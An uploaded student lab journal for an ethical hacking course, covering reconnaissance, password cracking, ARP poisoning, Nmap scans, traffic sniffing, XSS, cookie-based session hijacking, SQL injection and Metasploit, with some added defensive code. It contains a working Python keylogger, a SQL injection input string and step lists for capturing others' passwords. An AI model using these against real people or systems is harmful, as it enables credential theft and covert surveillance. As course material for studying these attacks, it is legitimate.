
EH Journal

The document provides a certificate certifying that a student satisfactorily completed practical work in the subject of ethical hacking. It lists 10 practical experiments conducted covering topics like reconnaissance using Google and Whois, password cracking using CrypTool and Cain & Abel, network analysis using Linux tools, port scanning with Nmap, capturing network traffic with Wireshark, cross-site scripting attacks, session impersonation, SQL injection, creating keyloggers with Python, and exploiting systems with Metasploit.

Uploaded by

ag505848

R.D. & S. H. National College & S. W.A. Science College
Bandra, Mumbai – 400050.

Department of Computer Science

CERTIFICATE

This is to certify that Mr. Aryan Gupta of T.Y.B.Sc (Computer Science) class (VI Semester) bearing Roll No / University Seat No CS21040 / 1108272 has satisfactorily completed Practicals in the subject of Ethical Hacking, a part of the B.Sc. in Computer Science Program, during the academic year 2023 – 2024.

Date of Certification:

Subject Incharge Co-ordinator,


Department Computer Science
Signature of Examiner
INDEX

SR.NO. | TITLE                                                            | DATE       | SIGN
1      | Google and Whois Reconnaissance                                  | 11-01-2024 |
2      | Password Encryption and Cracking with CrypTool and Cain and Abel | 18-01-2024 |
3      | Linux Network Analysis and ARP Poisoning                         | 25-01-2024 |
4      | Port Scanning with NMap                                          | 02-02-2024 |
5      | Network Traffic Capture and DoS Attack with Wireshark and Nemesy | 08-02-2024 |
6      | Persistent Cross-Site Scripting Attack                           | 16-02-2024 |
7      | Session Impersonation with Firefox and Tamper Data               | 01-03-2024 |
8      | SQL Injection Attack                                             | 08-03-2024 |
9      | Creating a Keylogger with Python                                 | 22-03-2024 |
10     | Exploiting with Metasploit (Kali Linux)                          | 30-03-2024 |

PRACTICAL NO.1

AIM: Google and Who.is Reconnaissance


Reconnaissance is one of the techniques in ethical hacking and penetration testing in which information about a target system, organization, or individual is collected using publicly available tools and resources.

Using who.is

Step 1: Open the WHO.is website.

Step 2: Enter the website name and press the “Enter” button.
Step 3: The site shows information about www.prestashop.com.
PRACTICAL NO. 2

2.1) Use CrypTool to encrypt and decrypt passwords using the RC4 algorithm.

Using tools like CrypTool and Cain & Abel to explore password encryption and cracking provides a valuable
learning experience in understanding the strengths and weaknesses of cryptographic methods and
password security. Below, I outline how you can use these tools in an ethical hacking context to
encrypt and then attempt to crack passwords. This practical is designed for educational purposes to
better understand and improve cybersecurity measures.

Step 1:
Step 2: Using RC4.

Encryption using RC4

Decryption
2.2) Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode
wireless network passwords

Click on Hash Calculator.

Enter the password to convert into a hash.


Paste the value you have converted into the field.

e.g. (MD5)

Right-click on the hash and select the dictionary attack.

Then right-click on the file, select (Add to List), and then select the wordlist.
Select all the options and start the dictionary attack.
PRACTICAL NO. 3

3.1) Using the traceroute, ping, ifconfig and netstat commands

Step 1: Type the tracert command followed by www.prestashop.com and press “Enter”.


Step 2: Ping all the IP addresses

Ifconfig
Netstat
3.2) Perform ARP Poisoning in Windows

Step 2: Select Sniffer at the top.


Step 3: Next to the folder icon, click on the icon named start/stop sniffer. Select the device and click on OK.

Step 4: Click on the “+” icon at the top. Click on OK.

Step 5: The connected hosts are shown.


Step 6: Select ARP at the bottom.

Step 7: Click on the “+” icon at the top.


Step 8: Click on the start/stop ARP icon at the top.
Step 9: Poisoning the source.

Step 10: Go to any website on the source IP address.


Step 11: Go to the password option in Cain & Abel and see the visited site password.
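
A defender-side check for the condition this practical creates, as an added example that is not part of the original journal: on a poisoned Windows host, `arp -a` shows one MAC address answering for several IP addresses, usually including the gateway. The ARP table below is constructed sample output, and the gateway address and baseline MAC are assumptions.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output from a Windows host (sample data, not a capture
# from the journal). 192.168.1.1 is assumed to be the default gateway.
ARP_OUTPUT = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-aa-bb-cc     dynamic
  192.168.1.23          00-0c-29-aa-bb-cc     dynamic
  192.168.1.40          3c-52-82-11-22-33     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)",
    re.I,
)

def parse_arp_table(text):
    """Return (ip, mac, type) tuples from Windows `arp -a` output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m.group(1), m.group(2).lower(), m.group(3).lower()))
    return rows

def shared_macs(rows):
    """Map each MAC that answers for more than one dynamic IP to those IPs."""
    by_mac = defaultdict(list)
    for ip, mac, kind in rows:
        if kind == "dynamic":          # static broadcast/multicast rows are skipped
            by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_changed(rows, gateway_ip, known_mac):
    """True if the gateway's current MAC differs from the recorded baseline."""
    current = {ip: mac for ip, mac, _ in rows}.get(gateway_ip)
    return current is not None and current != known_mac.lower()

if __name__ == "__main__":
    table = parse_arp_table(ARP_OUTPUT)
    print("MACs claimed by several hosts:", shared_macs(table))
    print("gateway MAC changed:", gateway_changed(table, "192.168.1.1", "A4-91-B1-00-00-01"))
```

On networks that support it, Dynamic ARP Inspection on the switch or a static ARP entry for the gateway prevents the forged replies from being accepted in the first place.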
PRACTICAL NO. 4

AIM : Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS.

Port scanning is a fundamental technique in ethical hacking used to determine which ports on a
networked system are open, closed, or filtered. This process helps identify active services and potentially
vulnerable points on a target system. Nmap (Network Mapper) is one of the most popular and powerful
tools used for port scanning and network discovery.

NOTE: Download Nmap for Windows and install it. After that, open cmd and type “nmap” to check that it is
installed properly. Now type the commands below.

• ACK Scan (-sA)


This scan never determines open (or even open|filtered) ports. It is used to map out firewall rulesets,
determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

• SYN (Stealth) Scan (-sS)


SYN scan is the default and most popular scan option for good reason. It can be performed
quickly, scanning thousands of ports per second on a fast network not hampered by intrusive
firewalls.

Command: nmap -p22,113,139 scanme.nmap.org

• FIN Scan (-sF)


Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

• NULL Scan (-sN)


Does not set any bits (the TCP flag header is 0).

Command: nmap -sN -p 22 scanme.nmap.org

• XMAS Scan (-sX)


Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org
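
How a sensor can recognise the five probe types above from the TCP flag byte, as an added example that is not part of the original journal. The headers are constructed test input built by the hypothetical helper `make_header`; nothing is sent on the network.

```python
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag combinations sent by the five scan types in this practical.
PROBE_TYPES = {
    0x00: "NULL scan probe (-sN)",
    FIN: "FIN scan probe (-sF)",
    FIN | PSH | URG: "XMAS scan probe (-sX)",
    SYN: "SYN (connection open or -sS probe)",
    ACK: "bare ACK (established traffic or -sA probe)",
}

def tcp_flags(header: bytes) -> int:
    """Return the six classic flag bits from a raw TCP header."""
    if len(header) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    return header[13] & 0x3F

def classify(header: bytes) -> str:
    return PROBE_TYPES.get(tcp_flags(header), "other")

def never_legitimate(header: bytes) -> bool:
    """NULL, bare FIN and XMAS segments do not occur in a normal TCP
    conversation, so a sensor can alert on them without tracking state.
    SYN and ACK probes look like ordinary traffic and need rate or
    connection-state checks instead."""
    return tcp_flags(header) in (0x00, FIN, FIN | PSH | URG)

def make_header(dport: int, flags: int, sport: int = 40000) -> bytes:
    """Build a minimal 20-byte TCP header (constructed test input)."""
    offset_flags = (5 << 12) | flags          # data offset of 5 words, then flags
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, offset_flags, 1024, 0, 0)

if __name__ == "__main__":
    for flags in (0x00, FIN, FIN | PSH | URG, SYN, ACK, SYN | ACK):
        hdr = make_header(22, flags)
        print(f"{flags:#04x}  {classify(hdr):45s} alert={never_legitimate(hdr)}")
```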


PRACTICAL NO. 5
5.1) Use the Wireshark sniffer to capture and analyze network traffic.
Network traffic capture and analysis, along with testing a network's resilience to Denial of Service (DoS)
attacks, are crucial aspects of ethical hacking. Tools like Wireshark for capturing and analyzing network
traffic, and Nemesy for generating DoS attack simulations, are widely used in the cybersecurity field.

Step 1: Install and open Wireshark.


Step 2: Go to Capture tab and select Interface option.

Step 3: In Capture interface, Select Local Area Connection and click on start.
Step 4: The source, destination and protocols of the packets on the LAN are displayed.
Step 5: Open a website in a new window and enter the user id and password. Register if needed.
Step 6: Enter the credentials and then sign in.

Step 7: The Wireshark tool will keep recording the packets.


Step 8: Select filter as http to make the search easier and click on apply.

Step 9: Now stop the tool to stop recording.


Step 10: Find the post methods for username and passwords.

Step 11: You will see the email ID and password that you used to log in.

DOS
Using NEMESIS
PRACTICAL NO. 6
AIM: Simulate a persistent Cross-Site Scripting attack.

Persistent XSS is a type of security vulnerability found in web applications where the attacker injects
malicious scripts into user input fields, such as text boxes or comment sections, which are then stored on
the server-side and displayed to other users when they visit the affected page. Unlike reflected XSS,
where the injected script is reflected off the web server, persistent XSS persists over time because the
malicious script is permanently stored on the server.
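
The stored-then-displayed flow described above, with the unsafe rendering beside the corrected one, as an added example that is not part of the original journal. The comment store, function names and sample submissions are constructed for illustration.

```python
import html
import sqlite3

def make_store():
    """In-memory comment store standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    return db

def save_comment(db, author, body):
    # Stored as submitted: the input is data, and it is encoded at output time.
    db.execute("INSERT INTO comments VALUES (?, ?)", (author, body))

def render_vulnerable(db):
    """Deliberately unsafe: stored text is concatenated into the page as HTML."""
    rows = db.execute("SELECT author, body FROM comments").fetchall()
    return "".join(f"<li><b>{a}</b>: {b}</li>" for a, b in rows)

def render_hardened(db):
    """Every stored value is HTML-encoded before it reaches the page."""
    rows = db.execute("SELECT author, body FROM comments").fetchall()
    return "".join(
        f"<li><b>{html.escape(a)}</b>: {html.escape(b)}</li>" for a, b in rows
    )

# Response header a server would add as a second layer (assumed policy).
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")

# Constructed sample submissions.
db = make_store()
save_comment(db, "alice", "Nice post!")
save_comment(db, "mallory", "<script>alert(1)</script>")

if __name__ == "__main__":
    print(render_vulnerable(db))   # the script element reaches every visitor
    print(render_hardened(db))     # the same text is shown as inert characters
```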
PRACTICAL NO. 7
AIM: Session impersonation using Firefox and Tamper Data add-on

Session impersonation, also known as session hijacking or session fixation, is a type of cyber attack where
an unauthorized party gains control over a user's session on a web application. In a typical web application
session, a user is assigned a unique identifier, often in the form of a session ID or token, upon
authentication. This identifier is used to track the user's interactions with the application until they log out
or the session expires.

A] Session Impersonation
STEPS
1. Open Firefox.
2. Go to Tools > Add-ons > Extensions.
3. Search for and install EditThisCookie, Cookie Import/Export, or any other cookie tool.
4. Then click on the cookie extension to get the cookie.
5. Open a website, log in, and then click on export cookie.

Log out from the webpage once the cookie has been exported.


Paste the cookie you exported into the tool and click on the green tick.

And you are in.
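
The replay above succeeds only when the server still honours the session after logout. The following added example (not part of the original journal) shows a server-side session table where logout deletes the record, so the exported cookie stops working, together with the cookie attributes that limit theft. The class and function names and the username are hypothetical.

```python
import secrets
import time
from http.cookies import SimpleCookie

class SessionStore:
    """Server-side session table; the cookie carries only a random ID."""

    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._sessions = {}            # session id -> (username, expiry time)

    def login(self, username):
        sid = secrets.token_urlsafe(32)          # fresh ID at every login
        self._sessions[sid] = (username, time.time() + self.ttl)
        return sid

    def user_for(self, sid):
        """Return the username for a live session, or None."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        username, expires = entry
        if time.time() >= expires:
            del self._sessions[sid]
            return None
        return username

    def logout(self, sid):
        # Clearing the browser cookie alone is not enough: the record must go,
        # otherwise an exported copy of the cookie keeps working.
        self._sessions.pop(sid, None)

def session_cookie(sid):
    """Set-Cookie value with the attributes that limit theft and replay."""
    c = SimpleCookie()
    c["session"] = sid
    c["session"]["httponly"] = True    # not readable from page scripts
    c["session"]["secure"] = True      # only sent over HTTPS
    c["session"]["samesite"] = "Lax"
    return c["session"].OutputString()

def replay_after_logout(store):
    """Re-create the practical: copy the cookie, log out, present the copy."""
    sid = store.login("student")       # constructed username
    exported = sid                     # what a cookie export tool would hold
    before = store.user_for(exported)
    store.logout(sid)
    return before, store.user_for(exported)
```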


Tamper DATA add-on

1. Open Firefox.
2. Go to Tools > Add-ons > Extensions.
3. Search for and install Tamper Data.

Select a website for tampering with data, e.g. (razorba)

Select any item to buy.


Then click Add to Cart.
Then click on the tool for tampering with data.
Then start tampering with the data.

Here you go.
PRACTICAL NO. 8

AIM: Perform SQL injection attack.

SQL injection (SQLi) is a type of cyber attack that targets the vulnerabilities in a web application's
database layer. It occurs when an attacker injects malicious SQL (Structured Query Language) code into
input fields or parameters used by an application to interact with its database. This injected SQL code can
manipulate the database in unintended ways, potentially allowing the attacker to execute unauthorized
SQL queries, retrieve sensitive data, modify or delete database records, and in some cases, take control
of the entire database server.

Step 1: Open XAMPP and start Apache and MySQL.

Step 2: Go to the web browser and open localhost/phpmyadmin.


Step 3: Create a database named sql_db.

Step 4: Go to localhost/sql_injection/setup.php and click on create/reset database.

Step 5: Go to login.php and login using admin and .


Step 6: The home page opens.

Step 7: Go to the security setting option on the left and set the security level to low.
Step 8: Click on the SQL injection option on the left.
Step 9: Write "1" in the text box and click on submit.

Step 10: Write "a' or ''='" in the text box and click on submit.


Step 11: Write "1=1" in the text box and click on submit.

Step 12: Write "1*" in the text box and click on submit.
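
Why the input from Step 10 returns every record while the others do not, and how parameter binding stops it, as an added example that is not part of the original journal. The table, its rows and the query are assumptions standing in for the lab application, which the journal does not show.

```python
import sqlite3

def make_db():
    """Constructed users table standing in for the lab application's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("1", "admin"), ("2", "Asha"), ("3", "Ravi")],
    )
    return db

def lookup_vulnerable(db, user_id):
    """Deliberately unsafe: the input is pasted into the SQL text."""
    query = f"SELECT first_name FROM users WHERE user_id = '{user_id}'"
    return [row[0] for row in db.execute(query)]

def lookup_parameterized(db, user_id):
    """The input is bound as a value and is never parsed as SQL."""
    query = "SELECT first_name FROM users WHERE user_id = ?"
    return [row[0] for row in db.execute(query, (user_id,))]

def lookup_validated(db, user_id):
    """Parameter binding plus an allow-list check on the expected format."""
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("user_id must be numeric")
    return lookup_parameterized(db, user_id)

if __name__ == "__main__":
    db = make_db()
    # The four inputs typed in Steps 9 to 12.
    for value in ["1", "a' or ''='", "1=1", "1*"]:
        # With the Step 10 input the WHERE clause becomes
        #   user_id = 'a' or ''=''
        # which is true for every row.
        print(repr(value), lookup_vulnerable(db, value), lookup_parameterized(db, value))
```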


PRACTICAL NO. 9

AIM: Create a simple keylogger using Python.

A keylogger is a type of software or hardware device that records every keystroke typed on a computer
keyboard. It can capture keystrokes in real-time and store them locally or transmit them to a remote
location controlled by an attacker.

Code:
- -----------------------------------------------------------------------------------
from pynput.keyboard import Key, Listener
import logging

# If no directory is given, the log is written to the current directory
log_dir = ""

# This is a basic logging function
logging.basicConfig(filename=(log_dir + "key_log.txt"),
                    level=logging.DEBUG,
                    format='%(asctime)s:%(message)s:')

# This is from the library
def on_press(key):
    logging.info(str(key))

# This says, listener is on
with Listener(on_press=on_press) as listener:
    listener.join()
Output: -
PRACTICAL NO. 10

AIM: Using Metasploit to exploit


Metasploit is a comprehensive penetration testing framework used by security professionals, ethical
hackers, and researchers to assess the security of systems, networks, and applications. It offers a wide
range of tools and modules designed to identify, exploit, and mitigate vulnerabilities.

Steps:
Download and open metasploit
Use exploit to attack the host
Create the exploit and add the exploit to the victim’s PC
